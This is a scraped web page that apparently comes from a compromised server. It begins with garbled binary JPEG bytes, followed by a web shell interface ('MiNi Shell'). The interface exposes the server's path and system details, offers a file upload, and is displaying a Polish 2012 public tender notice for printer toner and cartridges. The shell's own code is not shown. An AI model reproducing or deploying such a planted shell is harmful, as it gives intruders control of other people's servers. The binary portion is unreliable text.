JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120124/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120124/21267-N-2012.html

<p class="kh_header"><b>Warszawa: Materiały eksploatacyjne do drukarek i kserokopiarek</b><br>
<b>Numer ogłoszenia: 21267 - 2012; data zamieszczenia: 24.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Farmaceutyczny , ul. Rydygiera 8, 01-793 Warszawa, woj. mazowieckie, tel. 022 4563866, faks 022 4563879.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ifarm.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka naukowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Materiały eksploatacyjne do drukarek i kserokopiarek.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia

1. Przedmiotem zamówienia jest dostawa materiałów eksploatacyjnych, którymi są  wkłady drukujące i tonery do sprzęt eksploatowanego przez Zamawiającego, którym są drukarki i kserokopiarki wykazane w załączniku nr.1A do SIWZ. 
2. W załączniku nr.1A do SIWZ zostały podane typy sprzętu, nazwa materiału i ilości.
3. Oferowane materiały eksploatacyjne  muszą spełniać następujące wymagania:
3.1 muszą być fabrycznie nowe, tj. wykonane z nowych elementów, wcześniej nie używanych, nie regenerowane, nie refabrykowane, nie napełniane powtórnie, nie wchodzące wcześniej  -pierwotnie-, ani w całości, ani w części, w skład innych materiałów, bez śladów uszkodzenia, wolne od wad technicznych i kompletne.
3.2 muszą być opakowane w oryginalne opakowania zewnętrzne z logo oraz nazwą producenta, symbolem produktu, terminem przydatności do użytku i oznaczone numerem katalogowym, a także indywidualne wewnętrzne opakowanie z folii uniemożliwiające kontakt wkładów z atmosferą, zawilgocenie etc. podczas składowania i transportu, 
3.3 muszą posiadać jednorazową, czytelną plombę,
3.4 muszą posiadać datę ważności nie krótszą niż 12 miesięcy, liczoną od dnia każdorazowej dostawy do siedziby Zamawiającego.
4. Zamawiający  zgodnie z art. 30 ust 5 ustawy, dopuszcza możliwość zaoferowania produktów równoważnych, pod warunkiem bezwzględnego zachowania norm, parametrów i standardów, którymi charakteryzują się produkty wska?zane przez Zamawiającego. W przypadku wystąpienia wątpliwości Zamawiającego, co do oferowanych produktów równoważnych, obowiązek udowodnienia równoważności leży po stronie Wykonawcy. Pod pojęciem produkt równoważny Zamawiający rozumie produkt kompatybilny z typem sprzętu, do którego jest zamówiony - zgodnie z Załącznikiem nr 1A do SIWZ  tzn. że produkt równoważny nie powoduje ograniczeń funkcji  i możliwości sprzętu oraz jakości wydruku opisanych w warunkach technicznych producenta sprzętu, jest w pełni kompatybilny z oprogramowaniem urządzenia, o parametrach takich samych, bądź lepszych -pojemność tuszu/tonera, wydajność i jakość wydruku - w stosunku do typu zamawianego produktu fabrycznie nowego - nowo wytworzonego w całości-, pochodzącego od producenta urządzenia, do którego produkt jest przeznaczony. Produkt równoważny to taki, który w porównaniu z wyrobem oryginalnym charakteryzuje się porównywalną, tj. taką samą, bądź lepszą jakością wydruku, szybkością schnięcia, kolorystyką, wydajnością oraz zapewnia takie same funkcje, np. dokładna informacja w urządzeniu lub oprogramowaniu o stanie zużycia wkładu. Wszystkie elementy wchodzące w skład równoważnych materiałów eksploatacyjnych również muszą być fabrycznie nowe -tj. wykonane z nowych elementów, wcześniej nie używanych, nieregenerowane, nie refabrykowane, niewchodzące wcześniej -pierwotnie-, ani w całości, ani w części, w skład innych materiałów-. 
4.1 Produkt równoważny musi posiadać dokument potwierdzający zgodność oferowanych materiałów eksploatacyjnych z normami: ISO IEC 24711 dla tuszy atramentowych, ISO IEC 19752 dla tonerów monochromatycznych, ISO IEC 19788 dla tonerów do drukarek kolorowych. Produkty równoważne muszą posiadać przewidziane przez producenta drukarki osprzęt elektroniczny, np. chip zliczający ilość kopii, mierzący ilość tonerów.
4.2 Producent produktu, zarówno oryginalnego, jak i równoważnego,  powinien posiadać certyfikat ISO 14001 lub równoważny na proces produkcji materiałów eksploatacyjnych, pozwalający zweryfikować, czy producent spełnia przepisy związane z ochroną środowiska oraz potwierdzający, że materiały są produkowane w sposób bezpieczny i nie wpływający negatywnie na środowisko. Producent materiałów eksploatacyjnych powinien również posiadać certyfikat potwierdzający, że proces produkcji materiałów eksploatacyjnych przebiega zgodnie z normami ISO 9001 lub równoważny. 
5.  Stosowanie materiałów eksploatacyjnych nie może powodować awarii czy uszkodzeń eksploatowanego sprzętu. 
6. Jeżeli w trakcie eksploatacji produktu równoważnego nastąpi awaria lub uszkodzenie sprzętu w związku z użytkowaniem  produktu równoważnego, Wykonawca -Dostawca- zobowiązany będzie do  naprawy uszkodzonego sprzętu, a w przypadku niemożliwości jego naprawy, wymiany na nowy sprzęt, na własny koszt.
7. Jeżeli w trakcie realizacji umowy Zamawiający stwierdzi, iż wydajność, jakość lub niezawodność dostarczonych produktów równoważnych niekorzystnie odbiega od produktu oferowanego, czy od parametrów produktu oryginalnego -pochodzącego od producenta urządzenia, do którego materiał jest przeznaczony- lub jeśli produkt nie sygnalizuje we właściwy sposób stanu zużycia tuszu lub tonera, Wykonawca, na żądanie Zamawiającego, powinien oferowany materiał -w asortymencie którego żądanie dotyczy- wymienić na produkt spełniający wymagania Zamawiającego -np. na produkt oryginalny pochodzący od producenta urządzenia, do którego jest przeznaczony - bez zmiany ceny, w terminie do 5 dni od zgłoszenia zawiadomienia faksem przez Zamawiającego.
8. W przypadku trzeciej reklamacji stanowiącej łącznie minimum 10% danego typu materiału eksploatacyjnego Zamawiający może żądać wymiany całości materiałów.
9. Warunki gwarancji: Zamawiający wymaga udzielenia na przedmiot zamówienia min 12  miesięcznej gwarancji jakości.
10. Zamawiający dopuszcza możliwość dostarczenia zamawianych produktów w tzw. dwu-pakach lub wielo-pakach, pod warunkiem, że Wykonawca wpisze w formularzu cenowym ceny jednostkowe dla każdego produktu, a każdy z produktów dostarczanych w dwu-paku lub wielo-paku będzie posiadał własne hermetyczne opakowanie.

 WYKAZ   URZĄDZEŃ 
Lp.	Typ sprzętu	Kolor tonera , tuszu	Ilość
1.	HP 2600n2605n 	czarny	6 szt.
2.	HP 2600n2605n		niebieski	8 szt.
3.	HP 2600n2605n 	żółty	6 szt.
5.	HP 2600n2605n	czerwony	6 szt.
6.	HP LJ CP1215 1515 1518	czarny	30 szt.
7.	HP LJ CP1215 1515 1518	niebieski	32 szt.
8.	HP LJ CP1215 1515 1518	żółty	32 szt.
9.	HP LJ CP1215 1515 1518	czerwony	32 szt.
10.	HP LJ CP4005	niebieski	3 szt.
11	HP LJ CP4005	czarny	3 szt.
12.	HP LJ CP4005	żółty	3 szt.
13.	HP LJ CP4005	czerwony	3 szt.
14.	HP LJ Color CP2025	czarny	3 szt.
15.	HP LJ Color  CP2025	czerwony	3 szt.
16.	HP LJ Color CP2025	niebieski	3 szt.
17.	HP LJ Color CP2025	żółty	3 szt.
18.	HP LJ 3000n 2700 	czarny	3 szt.
19.	HP LJ 3000n 2700	czerwony	2 szt.
20.	HP LJ 3000n 2700	żółty	2 szt.
21.	HP LJ 3000n 2700	niebieski	2 szt.
22.	EPSON Stylus D88 Plus	czarny	1 szt.
23.	EPSON Stylus D88 Plus	niebieski	1 szt.
24.	EPSON Stylus D88 Plus	czerwony	1 szt.
25.	EPSON Stylus D88 Plus	żółty	1 szt.
26.	K5500 88 głowica magenta cyan		2 szt.
27.	K5500 88 głowica czarna żółta		2 szt.
28.	HP Pro K5500 K5400 88 	czarny	22 szt.
29.	HP Pro K5500 K5400 88	żółty	12 szt.
30.	HP Pro K5500 K5400 88	czerwony	12 szt.
31.	HP Pro K5500 K5400 88	niebieski	12 szt.
32.	HP LJ 12001000	czarny	22 szt.
33.	HP LJ 1100 1100A	czarny	6 szt.
34.	HP LJ 1320 1160	czarny	7 szt.
35.	HP LJ 1010 1012 1015	czarny	11 szt.
36.	Canon 6512 ksero kopiarka	czarny	5 szt.
37.	HP LJ 1300	czarny	3 szt.
38.	HP 350 XL	czarny	6 szt.
39.	HP 351 XL		2 szt.
40.	KX-MB783 urządzenie wielofunkcyjne toner	czarny	3 op.
41.	KX-MB783 urządzenie wielofunkcyjne bęben	czarny	1 szt.
42.	HP LJ 2100 2200	czarny	1 szt.
43.	LJ 1200 3500	czarny	1 szt.
44.	RICOH AF1015 1018 kserokopiarka	czarny	1 szt.
45.	HP LJ P2015	czarny	6 szt.
46.	Folia do faxu Panasonic		
47.	HP LJ 4 4M 4plus 5 5M 5N	czarny	2 szt.
48.	RICOH typ 1270D AF 1515 1515F 1515PS 1515MF	czarny	2 szt.
49.	XEROX WC 5225 kserokopiarka	czarny	1 szt.
50.	XEROX Docu Print P8	czarny	
51.	HP DJ 5652	czarny	12 szt.
52.	HP DJ 5652	kolor	10 szt.
53.	HP K550 88 XL	czarny	1 szt.
54.	HP K550 88 XL	 niebieski	1 szt.
55.	HP K550 88 XL	 czerwony	1 szt.
56.	HP K550 88 XL	żółty	1 szt.
57.	DJ 5740/6940	czarny	33 szt.
58.	DJ 5740/6940	kolor	8 szt.
59.	DJ 6980	kolor	10 szt.
60.	HP OfficeJet 6000	czarny	12 szt.
61.	HP OfficeJet 6000	 niebieski	2 szt.
62.	HP OfficeJet 6000	czerwony	2 szt.
63.	HP OfficeJet 6000	żółty	1 szt.
64.	HP 2055 2055dn	czarny	34 szt.
65.	Canon MF 4330D	czarny	2 szt.
66.	HP Color LJ CP3525	 czarny	4 szt.
67.	HP LJ 1650EN	czarny	3 szt.
68.	HP LJ 1650EN	 niebieski	1 szt.
69.	HP LJ 1650EV	czerwony	1 szt.
70.	HP LJ 1650EN	żółty	1 szt.
71.	HP LJ 1525 1415A	czarny	14 szt.
72.	HP LJ 1525 1415A	niebieski	8 szt.
73.	HP LJ 1525 1415A	żółty	8 szt.
74.	HP LJ 1525 1415A	czerwony	8 szt.
75.	HP LJ 5L 6L 3100 3150	czarny	2 szt.
76.	Xerox 5225 5230 bęben		2 szt.
77.	Ricoh Aficio SP C231SF DDST	czarny	12 szt.
78.	Ricoh Aficio SP C231SF DDST	niebieski	8 szt.
79.	Ricoh Aficio SP C231SF DDST	 czerwony	8 szt.
80.	Ricoh Aficio SP C231SF DDST	 żółty	8 szt.
81.	HP Color LJ CP3525	niebieski	2 szt.
82.	HP Color LJ CP3525	 żółty	2 szt.
83.	HP Color LJ CP3525	czerwony	2 szt.
84.	HP LJ CP1025	 czarny	3 szt.
85.	HP LJ CP1025	 niebieski	3 szt.
86.	HP LJ CP1025	żółty	3 szt.
87.	HP LJ CP1025	czerwony	3 szt.
88.	Drukarka Lexmark C540	 czarny
	1 szt.
89.	Drukarka Lexmark C540	 niebieski	1 szt.
90.	Drukarka Lexmark C540	czerwony	1 szt.
91.	Drukarka Lexmark C540	 żółty	1 szt.
92.	Urządzenie wielofunkcyjne Lexmark X546dtn	 czarny
	1 szt.

93.	Urządzenie wielofunkcyjne Lexmark X546dtn	 niebieski
	1 szt.

94.	Urządzenie wielofunkcyjne Lexmark X546dtn	czerwony
	1 szt. 

95.	Urządzenie wielofunkcyjne Lexmark X546dtn	żółty	1 szt.

96.	Drukarka kolorowa laser Lexmark C543dn	czarny
	1 szt.
97.	Drukarka kolorowa laser Lexmark C543dn	 niebieski	1 szt.
98.	Drukarka kolorowa laser Lexmark C543dn	 czerwony	1 szt.
99.	Drukarka kolorowa laser Lexmark C543dn	żółty	1 szt.
100.	Drukarka cz-b laser Lexmark E260dn 	czarny	1 szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.10-5, 30.12.51.10-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> brak</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia moga ubiegać się Wykonawcy, którzy zrealizowali lub realizują w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej trzy dostawy nie mniejsze niż 100 000 zł netto.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia moga ubiegać się Wykonawcy, którzy są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zam ówienia, na sumę ubezpieczeniową nie mniejszą niż: 50 000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Oferta na wykonanie zamówienia publicznego (Zał. nr 1 do SIWZ)
2)	Formularza cenowego załączniki nr 1A.
3)	Dokumentów potwierdzających uprawnienia osób podpisujących ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów rejestrowych.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę umowy w formie aneksu w sytuacji zmiany obowiązujących przepisów, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego. Zmiana wymaga zgłoszenia w formie pisemnej w ciągu 14 dni od powzięcia informacji stanowiącej podstawę do wprowadzenia zmian. Zmiana ta może spowodować wydłużenie terminu wykonania prac i nie spowoduje zmiany wynagrodzenia Wykonawcy. Inicjatorem tej zmiany może być Zamawiający lub Wykonawca.
Zamawiający dopuszcza zmianę umowy w formie aneksu w sytuacji, kiedy nastąpi ustawowa zmiana stawki VAT. Inicjatorem tej zmiany może być Zamawiający lub Wykonawca. Zmiana wymaga zgłoszenia w formie pisemnej w ciągu 14 dni od powzięcia informacji stanowiącej podstawę do wprowadzenia zmian. Zmiana ta nie wpłynie na termin wykonania prac i spowoduje zmianę wynagrodzenia Wykonawcy brutto. Kwota netto wynagrodzenia pozostanie bez zmian.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ifarm.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> INSTYTUT FARMACEUTYCZNY, 01-793 Warszawa, ul. Rydygiera 8..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.02.2012 godzina 12:00, miejsce: INSTYTUT FARMACEUTYCZNY, 01-793 Warszawa, ul. Rydygiera 8 w kancelarii  Instytutu w budynku nr 17 pokój nr 11 ( kancelaria pracuje do 13:00)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> W ramach Programu Operacyjnego Innowacyjna Gospodarka 2007-2013 (POIG), Instytut Farmaceutyczny (IF) realizuje projekt badawczo-rozwojowy w dziedzinie nauk farmaceutycznych pt.: Opracowanie innowacyjnych technologii leków oftalmicznych o szczególnym znaczeniu terapeutycznym i społecznym;
Innowacyjne technologie leków onkologicznych o szczególnym znaczeniu terapeutycznym i społecznym; Innowacyjne technologie leków sercowo-naczyniowych o szczególnym znaczeniu terapeutycznym i społecznym; Poszukiwanie innowacyjnego leku śródbłonkowego w grupie nowych pochodnych escyny..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com